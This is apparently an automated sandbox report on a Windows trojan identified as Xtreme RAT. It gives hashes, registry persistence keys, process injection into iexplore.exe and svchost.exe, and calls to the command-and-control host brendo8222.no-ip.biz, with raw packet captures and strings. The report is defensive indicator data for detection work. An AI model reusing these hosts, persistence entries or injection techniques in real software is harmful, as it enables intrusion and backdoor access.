Analysis Date2013-12-16 01:17:54
MD5ba1eaa4ea977517dcdaefd3927f292ff
SHA1d5c732cf5c4034e8b719a2beab162f34a98547f2

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
SectionUPX0 md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0
SectionUPX1 md5: cbd8324b7ee5a8b5e2f6d4e496c0a09c sha1: 455e709e6a769bf320f1daa85d506d533804ce19 size: 19456
Section.rsrc md5: 76aafabe1c912aea6e6cbe39186e3abd sha1: 7a6045d3f24c4da500b9efa5020422813be69b4c size: 1024
Timestamp1992-06-19 22:22:17
PackerUPX -> www.upx.sourceforge.net
PEhash3834a9308b0bc91b8df0eaf17ba7f45d98d5ed2d
AVclamavWIN.Trojan.Xtreme
AVaviraTR/Downloader.Gen
AVavgCryptic.CWS
AVmsseBackdoor:Win32/Xtrat.A
AVmcafeeBackDoor-FAJ

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\{J7415I86-20E5-T71J-W13A-27B3377SB565}\StubPath ➝
C:\WINDOWS\system32\InstallDir\Server.exe restart
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\HKCU ➝
C:\WINDOWS\system32\InstallDir\Server.exe
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\HKLM ➝
C:\WINDOWS\system32\InstallDir\Server.exe
RegistryHKEY_CURRENT_USER\SOFTWARE\5mMGC\ServerStarted ➝
12/16/2013 0:18:28 AM
Creates FileC:\WINDOWS\system32\InstallDir\Server.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\5mMGC.cfg
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\x.html
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\x.html
Creates ProcessC:\Program Files\Internet Explorer\iexplore.exe
Creates ProcessC:\Program Files\Internet Explorer\iexplore.exe
Creates Processsvchost.exe
Creates ProcessC:\Program Files\Internet Explorer\iexplore.exe
Creates Mutex5mMGCPERSIST
Creates MutexXTREMEUPDATE
Creates Mutex5mMGC

Process
↳ C:\Program Files\Internet Explorer\iexplore.exe

Creates Mutex5mMGC

Process
↳ C:\Program Files\Internet Explorer\iexplore.exe

Creates Mutex5mMGC

Process
↳ C:\Program Files\Internet Explorer\iexplore.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\5mMGC.dat
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates File\Device\Afd\AsyncConnectHlp
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex5mMGC
Winsock DNSbrendo8222.no-ip.biz
Winsock DNSwww.webserver.com

Process
↳ svchost.exe

RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\{J7415I86-20E5-T71J-W13A-27B3377SB565}\StubPath ➝
C:\WINDOWS\system32\InstallDir\Server.exe restart
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\HKCU ➝
C:\WINDOWS\system32\InstallDir\Server.exe
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\HKLM ➝
C:\WINDOWS\system32\InstallDir\Server.exe
Creates ProcessC:\WINDOWS\system32\InstallDir\Server.exe
Creates ProcessC:\WINDOWS\system32\InstallDir\Server.exe
Creates Mutex5mMGCPERSIST
Creates Mutex5mMGC
Creates Mutex5mMGCEXIT

Process
↳ C:\WINDOWS\system32\InstallDir\Server.exe

Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\5mMGC.cfg
Deletes FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\5mMGC.cfg
Creates MutexXTREMEUPDATE
Creates Mutex5mMGC

Process
↳ C:\WINDOWS\system32\InstallDir\Server.exe

Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\5mMGC.cfg
Deletes FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\5mMGC.cfg
Creates MutexXTREMEUPDATE
Creates Mutex5mMGC

Network Details:

DNSwww.webserver.com
Type: A
82.98.86.174
DNSbrendo8222.no-ip.biz
Type: A
8.23.224.90
HTTP GEThttp://www.webserver.com/plugin.xtr
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://brendo8222.no-ip.biz/1230.functions
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://www.webserver.com/plugin.xtr
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://brendo8222.no-ip.biz:81/1230.functions
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://www.webserver.com/plugin.xtr
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://brendo8222.no-ip.biz:82/1230.functions
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://www.webserver.com/plugin.xtr
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://brendo8222.no-ip.biz:8080/1230.functions
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://www.webserver.com/plugin.xtr
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://brendo8222.no-ip.biz:2185/1230.functions
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP192.168.1.1:1032 ➝ 82.98.86.174:80
Flows TCP192.168.1.1:1033 ➝ 8.23.224.90:80
Flows TCP192.168.1.1:1034 ➝ 82.98.86.174:80
Flows TCP192.168.1.1:1035 ➝ 8.23.224.90:81
Flows TCP192.168.1.1:1036 ➝ 82.98.86.174:80
Flows TCP192.168.1.1:1037 ➝ 8.23.224.90:82
Flows TCP192.168.1.1:1038 ➝ 82.98.86.174:80
Flows TCP192.168.1.1:1039 ➝ 8.23.224.90:8080
Flows TCP192.168.1.1:1040 ➝ 82.98.86.174:80
Flows TCP192.168.1.1:1041 ➝ 8.23.224.90:2185

Raw Pcap
0x00000000 (00000)   47455420 2f706c75 67696e2e 78747220   GET /plugin.xtr 
0x00000010 (00016)   48545450 2f312e31 0d0a4163 63657074   HTTP/1.1..Accept
0x00000020 (00032)   3a202a2f 2a0d0a41 63636570 742d456e   : */*..Accept-En
0x00000030 (00048)   636f6469 6e673a20 677a6970 2c206465   coding: gzip, de
0x00000040 (00064)   666c6174 650d0a55 7365722d 4167656e   flate..User-Agen
0x00000050 (00080)   743a204d 6f7a696c 6c612f34 2e302028   t: Mozilla/4.0 (
0x00000060 (00096)   636f6d70 61746962 6c653b20 4d534945   compatible; MSIE
0x00000070 (00112)   20362e30 3b205769 6e646f77 73204e54    6.0; Windows NT
0x00000080 (00128)   20352e31 3b205356 313b202e 4e455420    5.1; SV1; .NET 
0x00000090 (00144)   434c5220 322e302e 35303732 37290d0a   CLR 2.0.50727)..
0x000000a0 (00160)   486f7374 3a207777 772e7765 62736572   Host: www.webser
0x000000b0 (00176)   7665722e 636f6d0d 0a436f6e 6e656374   ver.com..Connect
0x000000c0 (00192)   696f6e3a 204b6565 702d416c 6976650d   ion: Keep-Alive.
0x000000d0 (00208)   0a0d0a                                ...

0x00000000 (00000)   47455420 2f313233 302e6675 6e637469   GET /1230.functi
0x00000010 (00016)   6f6e7320 48545450 2f312e31 0d0a4163   ons HTTP/1.1..Ac
0x00000020 (00032)   63657074 3a202a2f 2a0d0a41 63636570   cept: */*..Accep
0x00000030 (00048)   742d456e 636f6469 6e673a20 677a6970   t-Encoding: gzip
0x00000040 (00064)   2c206465 666c6174 650d0a55 7365722d   , deflate..User-
0x00000050 (00080)   4167656e 743a204d 6f7a696c 6c612f34   Agent: Mozilla/4
0x00000060 (00096)   2e302028 636f6d70 61746962 6c653b20   .0 (compatible; 
0x00000070 (00112)   4d534945 20362e30 3b205769 6e646f77   MSIE 6.0; Window
0x00000080 (00128)   73204e54 20352e31 3b205356 313b202e   s NT 5.1; SV1; .
0x00000090 (00144)   4e455420 434c5220 322e302e 35303732   NET CLR 2.0.5072
0x000000a0 (00160)   37290d0a 486f7374 3a206272 656e646f   7)..Host: brendo
0x000000b0 (00176)   38323232 2e6e6f2d 69702e62 697a0d0a   8222.no-ip.biz..
0x000000c0 (00192)   436f6e6e 65637469 6f6e3a20 4b656570   Connection: Keep
0x000000d0 (00208)   2d416c69 76650d0a 0d0a                -Alive....

0x00000000 (00000)   47455420 2f706c75 67696e2e 78747220   GET /plugin.xtr 
0x00000010 (00016)   48545450 2f312e31 0d0a4163 63657074   HTTP/1.1..Accept
0x00000020 (00032)   3a202a2f 2a0d0a41 63636570 742d456e   : */*..Accept-En
0x00000030 (00048)   636f6469 6e673a20 677a6970 2c206465   coding: gzip, de
0x00000040 (00064)   666c6174 650d0a55 7365722d 4167656e   flate..User-Agen
0x00000050 (00080)   743a204d 6f7a696c 6c612f34 2e302028   t: Mozilla/4.0 (
0x00000060 (00096)   636f6d70 61746962 6c653b20 4d534945   compatible; MSIE
0x00000070 (00112)   20362e30 3b205769 6e646f77 73204e54    6.0; Windows NT
0x00000080 (00128)   20352e31 3b205356 313b202e 4e455420    5.1; SV1; .NET 
0x00000090 (00144)   434c5220 322e302e 35303732 37290d0a   CLR 2.0.50727)..
0x000000a0 (00160)   486f7374 3a207777 772e7765 62736572   Host: www.webser
0x000000b0 (00176)   7665722e 636f6d0d 0a436f6e 6e656374   ver.com..Connect
0x000000c0 (00192)   696f6e3a 204b6565 702d416c 6976650d   ion: Keep-Alive.
0x000000d0 (00208)   0a0d0a69 76650d0a 0d0a                ...ive....

0x00000000 (00000)   47455420 2f313233 302e6675 6e637469   GET /1230.functi
0x00000010 (00016)   6f6e7320 48545450 2f312e31 0d0a4163   ons HTTP/1.1..Ac
0x00000020 (00032)   63657074 3a202a2f 2a0d0a41 63636570   cept: */*..Accep
0x00000030 (00048)   742d456e 636f6469 6e673a20 677a6970   t-Encoding: gzip
0x00000040 (00064)   2c206465 666c6174 650d0a55 7365722d   , deflate..User-
0x00000050 (00080)   4167656e 743a204d 6f7a696c 6c612f34   Agent: Mozilla/4
0x00000060 (00096)   2e302028 636f6d70 61746962 6c653b20   .0 (compatible; 
0x00000070 (00112)   4d534945 20362e30 3b205769 6e646f77   MSIE 6.0; Window
0x00000080 (00128)   73204e54 20352e31 3b205356 313b202e   s NT 5.1; SV1; .
0x00000090 (00144)   4e455420 434c5220 322e302e 35303732   NET CLR 2.0.5072
0x000000a0 (00160)   37290d0a 486f7374 3a206272 656e646f   7)..Host: brendo
0x000000b0 (00176)   38323232 2e6e6f2d 69702e62 697a3a38   8222.no-ip.biz:8
0x000000c0 (00192)   310d0a43 6f6e6e65 6374696f 6e3a204b   1..Connection: K
0x000000d0 (00208)   6565702d 416c6976 650d0a0d 0a68313e   eep-Alive....h1>
0x000000e0 (00224)   0a202020 203c703e 596f7572 2062726f   .    <p>Your bro
0x000000f0 (00240)   77736572 2073656e 74206120 72657175   wser sent a requ
0x00000100 (00256)   65737420 74686174 20746869 73207365   est that this se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   47455420 2f706c75 67696e2e 78747220   GET /plugin.xtr 
0x00000010 (00016)   48545450 2f312e31 0d0a4163 63657074   HTTP/1.1..Accept
0x00000020 (00032)   3a202a2f 2a0d0a41 63636570 742d456e   : */*..Accept-En
0x00000030 (00048)   636f6469 6e673a20 677a6970 2c206465   coding: gzip, de
0x00000040 (00064)   666c6174 650d0a55 7365722d 4167656e   flate..User-Agen
0x00000050 (00080)   743a204d 6f7a696c 6c612f34 2e302028   t: Mozilla/4.0 (
0x00000060 (00096)   636f6d70 61746962 6c653b20 4d534945   compatible; MSIE
0x00000070 (00112)   20362e30 3b205769 6e646f77 73204e54    6.0; Windows NT
0x00000080 (00128)   20352e31 3b205356 313b202e 4e455420    5.1; SV1; .NET 
0x00000090 (00144)   434c5220 322e302e 35303732 37290d0a   CLR 2.0.50727)..
0x000000a0 (00160)   486f7374 3a207777 772e7765 62736572   Host: www.webser
0x000000b0 (00176)   7665722e 636f6d0d 0a436f6e 6e656374   ver.com..Connect
0x000000c0 (00192)   696f6e3a 204b6565 702d416c 6976650d   ion: Keep-Alive.
0x000000d0 (00208)   0a0d0a                                ...

0x00000000 (00000)   47455420 2f313233 302e6675 6e637469   GET /1230.functi
0x00000010 (00016)   6f6e7320 48545450 2f312e31 0d0a4163   ons HTTP/1.1..Ac
0x00000020 (00032)   63657074 3a202a2f 2a0d0a41 63636570   cept: */*..Accep
0x00000030 (00048)   742d456e 636f6469 6e673a20 677a6970   t-Encoding: gzip
0x00000040 (00064)   2c206465 666c6174 650d0a55 7365722d   , deflate..User-
0x00000050 (00080)   4167656e 743a204d 6f7a696c 6c612f34   Agent: Mozilla/4
0x00000060 (00096)   2e302028 636f6d70 61746962 6c653b20   .0 (compatible; 
0x00000070 (00112)   4d534945 20362e30 3b205769 6e646f77   MSIE 6.0; Window
0x00000080 (00128)   73204e54 20352e31 3b205356 313b202e   s NT 5.1; SV1; .
0x00000090 (00144)   4e455420 434c5220 322e302e 35303732   NET CLR 2.0.5072
0x000000a0 (00160)   37290d0a 486f7374 3a206272 656e646f   7)..Host: brendo
0x000000b0 (00176)   38323232 2e6e6f2d 69702e62 697a3a38   8222.no-ip.biz:8
0x000000c0 (00192)   320d0a43 6f6e6e65 6374696f 6e3a204b   2..Connection: K
0x000000d0 (00208)   6565702d 416c6976 650d0a0d 0a         eep-Alive....

0x00000000 (00000)   47455420 2f706c75 67696e2e 78747220   GET /plugin.xtr 
0x00000010 (00016)   48545450 2f312e31 0d0a4163 63657074   HTTP/1.1..Accept
0x00000020 (00032)   3a202a2f 2a0d0a41 63636570 742d456e   : */*..Accept-En
0x00000030 (00048)   636f6469 6e673a20 677a6970 2c206465   coding: gzip, de
0x00000040 (00064)   666c6174 650d0a55 7365722d 4167656e   flate..User-Agen
0x00000050 (00080)   743a204d 6f7a696c 6c612f34 2e302028   t: Mozilla/4.0 (
0x00000060 (00096)   636f6d70 61746962 6c653b20 4d534945   compatible; MSIE
0x00000070 (00112)   20362e30 3b205769 6e646f77 73204e54    6.0; Windows NT
0x00000080 (00128)   20352e31 3b205356 313b202e 4e455420    5.1; SV1; .NET 
0x00000090 (00144)   434c5220 322e302e 35303732 37290d0a   CLR 2.0.50727)..
0x000000a0 (00160)   486f7374 3a207777 772e7765 62736572   Host: www.webser
0x000000b0 (00176)   7665722e 636f6d0d 0a436f6e 6e656374   ver.com..Connect
0x000000c0 (00192)   696f6e3a 204b6565 702d416c 6976650d   ion: Keep-Alive.
0x000000d0 (00208)   0a0d0a2d 416c6976 650d0a0d 0a         ...-Alive....

0x00000000 (00000)   47455420 2f313233 302e6675 6e637469   GET /1230.functi
0x00000010 (00016)   6f6e7320 48545450 2f312e31 0d0a4163   ons HTTP/1.1..Ac
0x00000020 (00032)   63657074 3a202a2f 2a0d0a41 63636570   cept: */*..Accep
0x00000030 (00048)   742d456e 636f6469 6e673a20 677a6970   t-Encoding: gzip
0x00000040 (00064)   2c206465 666c6174 650d0a55 7365722d   , deflate..User-
0x00000050 (00080)   4167656e 743a204d 6f7a696c 6c612f34   Agent: Mozilla/4
0x00000060 (00096)   2e302028 636f6d70 61746962 6c653b20   .0 (compatible; 
0x00000070 (00112)   4d534945 20362e30 3b205769 6e646f77   MSIE 6.0; Window
0x00000080 (00128)   73204e54 20352e31 3b205356 313b202e   s NT 5.1; SV1; .
0x00000090 (00144)   4e455420 434c5220 322e302e 35303732   NET CLR 2.0.5072
0x000000a0 (00160)   37290d0a 486f7374 3a206272 656e646f   7)..Host: brendo
0x000000b0 (00176)   38323232 2e6e6f2d 69702e62 697a3a38   8222.no-ip.biz:8
0x000000c0 (00192)   3038300d 0a436f6e 6e656374 696f6e3a   080..Connection:
0x000000d0 (00208)   204b6565 702d416c 6976650d 0a0d0a3e    Keep-Alive....>
0x000000e0 (00224)   0a202020 203c703e 596f7572 2062726f   .    <p>Your bro
0x000000f0 (00240)   77736572 2073656e 74206120 72657175   wser sent a requ
0x00000100 (00256)   65737420 74686174 20746869 73207365   est that this se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   47455420 2f706c75 67696e2e 78747220   GET /plugin.xtr 
0x00000010 (00016)   48545450 2f312e31 0d0a4163 63657074   HTTP/1.1..Accept
0x00000020 (00032)   3a202a2f 2a0d0a41 63636570 742d456e   : */*..Accept-En
0x00000030 (00048)   636f6469 6e673a20 677a6970 2c206465   coding: gzip, de
0x00000040 (00064)   666c6174 650d0a55 7365722d 4167656e   flate..User-Agen
0x00000050 (00080)   743a204d 6f7a696c 6c612f34 2e302028   t: Mozilla/4.0 (
0x00000060 (00096)   636f6d70 61746962 6c653b20 4d534945   compatible; MSIE
0x00000070 (00112)   20362e30 3b205769 6e646f77 73204e54    6.0; Windows NT
0x00000080 (00128)   20352e31 3b205356 313b202e 4e455420    5.1; SV1; .NET 
0x00000090 (00144)   434c5220 322e302e 35303732 37290d0a   CLR 2.0.50727)..
0x000000a0 (00160)   486f7374 3a207777 772e7765 62736572   Host: www.webser
0x000000b0 (00176)   7665722e 636f6d0d 0a436f6e 6e656374   ver.com..Connect
0x000000c0 (00192)   696f6e3a 204b6565 702d416c 6976650d   ion: Keep-Alive.
0x000000d0 (00208)   0a0d0a                                ...

0x00000000 (00000)   47455420 2f313233 302e6675 6e637469   GET /1230.functi
0x00000010 (00016)   6f6e7320 48545450 2f312e31 0d0a4163   ons HTTP/1.1..Ac
0x00000020 (00032)   63657074 3a202a2f 2a0d0a41 63636570   cept: */*..Accep
0x00000030 (00048)   742d456e 636f6469 6e673a20 677a6970   t-Encoding: gzip
0x00000040 (00064)   2c206465 666c6174 650d0a55 7365722d   , deflate..User-
0x00000050 (00080)   4167656e 743a204d 6f7a696c 6c612f34   Agent: Mozilla/4
0x00000060 (00096)   2e302028 636f6d70 61746962 6c653b20   .0 (compatible; 
0x00000070 (00112)   4d534945 20362e30 3b205769 6e646f77   MSIE 6.0; Window
0x00000080 (00128)   73204e54 20352e31 3b205356 313b202e   s NT 5.1; SV1; .
0x00000090 (00144)   4e455420 434c5220 322e302e 35303732   NET CLR 2.0.5072
0x000000a0 (00160)   37290d0a 486f7374 3a206272 656e646f   7)..Host: brendo
0x000000b0 (00176)   38323232 2e6e6f2d 69702e62 697a3a32   8222.no-ip.biz:2
0x000000c0 (00192)   3138350d 0a436f6e 6e656374 696f6e3a   185..Connection:
0x000000d0 (00208)   204b6565 702d416c 6976650d 0a0d0a      Keep-Alive....


Strings
DVCLAL
PACKAGEINFO
XTREME
%06789:;<&'()*+,-./12345D
 1BSdM
,2003 Avenger by NhT
2!0cZ7
2226K6
"3DU4M
5l3n?n
7U'@~8R
#9Tdt#9
.A7toN
advapi
advapi32.dll
	{AvtX
+BMemory
BSSvY.
(c) 19
c`8R&i&iXDl6&i&i
CharNextW
Config 
CreateTool
DURLDr
	ECk'M
|eJ~aKf5tt
etI>io
ExitProcess
|<f;4C
FtpPutFileW
GecL]do*kh
GetModuleFileNameExW
GetProcAddress
-gT	bk
H32NextW
#iA;Kdt
IE't=\
ipbbrd|
IsWow2
izeofR(ourc
:	j0op
JL8T*T
j#T:#l
 K2PH*
k38O~m
KERNEL32.DLL
Keylogg
<KRBODQ
!K%/V-
KWindow
`lallA
ljnlD0($l
LKBIUW
LoadLibraryA
l(rlen,Wri-
nel32.
NJ$>]P#
npInf.ma0,
~nQ|i;
ntdll.dll
NtUnmapViewOfSection
`O5CGy
oleaut32.dll
pL/P1O
.P%	n*b
PSAPI.dll
q6q4_!e
qPwc-s
q$ Rtrw
raryAGBb5Unl
RegCloseKey
 _r$G2<TtGr$G
rlmonwin
rMod1EndOf"{
rocessDEPw0
RzN&+<{
se0[vN
SHDeleteKeyW
shell32.dll
SHGetMalloc
shlwapi.dll
SnapshotC
SysFreeString
t}$*$7
TeltiByt
This program must be run under Win32
tions Copyrigh
URLDownloadToFileW
urlmon.dll
user32.dll
UV32xw
VirtualAlloc
VirtualFree
VirtualProtect
Vl'qjd7
;']vVL
vYht1dQ
=Wfaj#
WideString
wininet.dll
$WUuDTS
x9	t+M>
XEGHF@A
XPTPSW
-zd6wsO
zf?&-R
]Z}$x.